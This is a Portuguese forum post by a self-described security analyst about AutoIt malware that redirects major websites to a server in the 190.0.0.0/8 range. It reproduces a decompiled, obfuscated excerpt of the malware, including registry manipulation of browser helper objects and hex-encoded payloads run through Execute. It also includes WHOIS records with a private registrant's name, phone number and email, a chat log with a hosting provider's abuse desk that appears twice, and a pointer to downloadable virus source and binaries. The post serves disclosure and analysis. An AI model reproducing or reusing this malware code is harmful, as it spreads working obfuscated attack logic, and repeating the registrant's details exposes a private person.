Fn0041("HKCR\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399003}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginBb") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginScd") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginUni") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginCef") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginAbn") Fn0041("HKCR\Gbieh.GbIehObj") Fn0041("HKCR\Gbieh.GbIehObj.1") Fn0041("HKCR\Gbieh.GbPluginObj") Fn0041("HKCR\Gbieh.GbPluginObj.1") Fn0041("HKCR\GbIeh.GbExplorerPersistObj") Fn0041("HKCR\GbIeh.GbExplorerPersistObj.1") Fn0041("HKCR\GbiehScd.GbIehObj") Fn0041("HKCR\GbiehScd.GbIehObj.1") Fn0041("HKCR\GbiehScd.GbPluginObj") Fn0041("HKCR\GbiehScd.GbPluginObj.1") Fn0041("HKCR\GbiehCef.GbIehObj") Fn0041("HKCR\GbiehCef.GbIehObj.1") Fn0041("HKCR\GbiehCef.GbPluginObj") Fn0041("HKCR\GbiehCef.GbPluginObj.1") Fn0041("HKCR\GbiehUni.GbIehObj") Fn0041("HKCR\GbiehUni.GbIehObj.1") Fn0041("HKCR\GbiehUni.GbPluginObj") Fn0041("HKCR\GbiehUni.GbPluginObj.1") Fn0041("HKCR\GbpDist.GbpDistObj") Fn0041("HKCR\GbpDist.GbpDistObj.1") Fn0041("HKCR\Interface\{5C350402-AD9A-41E7-A303-C49F6C520000}") Fn0041("HKCR\Interface\{7827CCC3-0DEB-4CFB-911C-AA777C8826EA}") Fn0041("HKCR\Interface\{C41A1C0D-EA6C-11D4-B1B8-444553540000}") Fn0041("HKCR\Interface\{6ADBBD75-3CEB-43BC-88EE-B8C2D50E0011}") Fn0041("HKCR\Interface\{7827CCC3-0DEB-4CFB-911C-5FA49E399011}") Fn0041("HKCR\Interface\{C41A1C0D-EA6C-11D4-B1B8-444553540011}") Fn0041("HKCR\Interface\{B3D037EB-D5BE-413D-8E16-E5B2A1B28BD8}") Fn0041("HKLM\SOFTWARE\Classes\GbiehScd.GbIehObj") Fn0041("HKLM\SOFTWARE\Classes\GbiehScd.GbIehObj.1") Fn0041("HKLM\SOFTWARE\Classes\GbiehScd.GbPluginObj") Fn0041("HKLM\SOFTWARE\Classes\GbiehScd.GbPluginObj.1") Fn0041("HKLM\SOFTWARE\Classes\Interface\{6ADBBD75-3CEB-43BC-88EE-B8C2D50E0011}") Fn0041("HKLM\SOFTWARE\Classes\Interface\{7827CCC3-0DEB-4CFB-911C-5FA49E399011}") Fn0041("HKLM\SOFTWARE\Classes\Interface\{C41A1C0D-EA6C-11D4-B1B8-444553540011}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540000}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540003}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540008}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540011}") Fn0041("HKLM\SOFTWARE\Wow6432Node\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540000}") Fn0041("HKLM\SOFTWARE\Wow6432Node\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540003}") Fn0041("HKLM\SOFTWARE\Wow6432Node\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540008}") Fn0041("HKLM\SOFTWARE\Wow6432Node\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540011}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policies\Ext\CLSID", "{E37CB5F0-51F5-4395-A808-5FA49E399011}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policies\Ext\CLSID", "{C41A1C0E-EA6C-11D4-B1B8-444553540011}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policie'es\Ext\CLSID", "{E37CB5F0-51F5-4395-A808-5FA49E399008}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policies\Ext\CLSID", "{C41A1C0E-EA6C-11D4-B1B8-444553540008}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policies\Ext\CLSID", "{C41A1C0E-EA6C-11D4-B1B8-444553540000}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\Shell Extensions\Approved", "{E37CB5F0-51F5-4395-A808-5FA49E399011}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\Explorer\ShellExecuteHooks", "{E37CB5F0-51F5-4395-A808-5FA49E399011}") EndFunc Func Fn0043() While $Var0067 Fn0036() Sleep(10) WEnd Fn0019() ProcessClVar0255e(@AutoItPID) Return EndFunc Func Fn0044() For $ax0x0xa = 1 To 5 Local $locVar0001 = Var0254x_() FileInstall("killer-x32x64-Menino.au3.tbl", $locVar0001, 1) Global $Var0254, $Var0255 = Execute(BinaryTVar0255tring("0x457865637574652842696E617279746F737472696E67282730783435373836353633373537343635323834323639364536313732373937343646373337343732363936453637323832373330373833353333333733343337333233363339333634353336333733353333333733303336343333363339333733343332333833343336333633393336343333363335333533323336333533363331333633343332333833323334333433313333333533333335333333303333333033333334333333303333333133333330333333343333333033373333333734313335343633323339333234333332333733373433333333313337343233323337333234333333333133323339323732393239272929")) If IsArray($Var0255) AND $Var0255[0] >= 1179 Then ExitLoop Sleep(10) Next Execute(BinaryTVar0255tring("0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383333333133323432333433363336333933363433333633353334333433363335333634333336333533373334333633353332333833323334333433313333333533333335333333303333333033333334333333303333333133333330333333343333333033373333333734313335343633323339323732393239272929")) EndFunc
Código:
# # The following results may also be obtained via: # http://whois.arin.net/rest/nets;q=190.120.227.114?showDetails=true&showARIN=false&ext=netref2 # NetRange: 190.0.0.0 - 190.255.255.255 CIDR: 190.0.0.0/8 OriginAS: NetName: NET190 NetHandle: NET-190-0-0-0-1 Parent: NetType: Allocated to LACNIC Comment: This IP address range is under LACNIC responsibility for further Comment: allocations to users in LACNIC region. Comment: Please see http://www.lacnic.net/ for further details, or check the Comment: WHOIS server located at http://whois.lacnic.net RegDate: 2005-06-17 Updated: 2010-07-21 Ref: http://whois.arin.net/rest/net/NET-190-0-0-0-1 OrgName: Latin American and Caribbean IP address Regional Registry OrgId: LACNIC Address: Rambla Republica de Mexico 6125 City: Montevideo StateProv: PostalCode: 11400 Country: UY RegDate: 2002-07-27 Updated: 2011-09-24 Ref: http://whois.arin.net/rest/org/LACNIC ReferralServer: whois://whois.lacnic.net OrgAbuseHandle: LACNIC-ARIN OrgAbuseName: LACNIC Whois Info OrgAbusePhone: 999-999-9999 OrgAbuseEmail: whois-contact@lacnic.net OrgAbuseRef: http://whois.arin.net/rest/poc/LACNIC-ARIN OrgTechHandle: LACNIC-ARIN OrgTechName: LACNIC Whois Info OrgTechPhone: 999-999-9999 OrgTechEmail: whois-contact@lacnic.net OrgTechRef: http://whois.arin.net/rest/poc/LACNIC-ARIN # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/whois_tou.html #
Código:
Registrant: xiujuan Chen xiujuan Chen lie dian bai sha zhou wuhan, NULL 430064 CN Phone: +86.8753067799 Email: lchenmailbox@yahoo.com Registrar Name....: Register.com Registrar Whois...: whois.register.com Registrar Homepage: www.register.com Domain Name: asiaworksmall.com Created on..............: 2004-01-07 Expires on..............: 2017-01-07 Administrative Contact: xiujuan Chen xiujuan Chen lie dian bai sha zhou wuhan, NULL 430064 CN Phone: +86.8753067799 Email: lchenmailbox@yahoo.com Technical Contact: Web.com Drone Team 12808 Gran Bay Parkway West Jacksonville, FL 32258 US Phone: +1.8009324678 Email: droneteam@corp.web.com DNS Servers: ns6.bona.us ns5.bona.us ns4.bona.us Visit AboutUs.org for more information about asiaworksmall.com AboutUs: asiaworksmall.com
You are now chatting with FT 1498
Welcome to FortaTrust chat. How can we help you today?
hi
> hi
> i am security analyst,
> and i have some malware warning from a IP in this server
> the ip is 190.120.227.114, are a virus written in autoit script, that redirect big websites like google to this server
> can u give me informations about the owner?
< please send your abuse complaint to abuse@fortatrust.com and we will take care of the issue
> i have the source-code of the virus
> if you need, i can send in the e-mail
< yes, send everything you have
< and they will take care of the problem
> ok, thank you very much. i will send it today
Welcome to FortaTrust chat. How can we help you today?
hi
> hi
> i am security analyst,
> and i have some malware warning from a IP in this server
> the ip is 190.120.227.114, are a virus written in autoit script, that redirect big websites like google to this server
> can u give me informations about the owner?
< please send your abuse complaint to abuse@fortatrust.com and we will take care of the issue
> i have the source-code of the virus
> if you need, i can send in the e-mail
< yes, send everything you have
< and they will take care of the problem
> ok, thank you very much. i will send it today
Logo quando tiver tempo vou enviar este e-mail e estudar melhor este código-fonte, e uma forma de remoção. Também vou estar enviando para AV researchers.
Por uma rápida olhada, parece ser um trojan, ou servidor de botnet, que notifica o servidor remoto, mas o código está muito ofuscado e cansativo de se ler.
Você pode baixar o código-fonte completo do vírus, bem como binários, Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Não execute os arquivos se não souber o que está fazendo.
Comment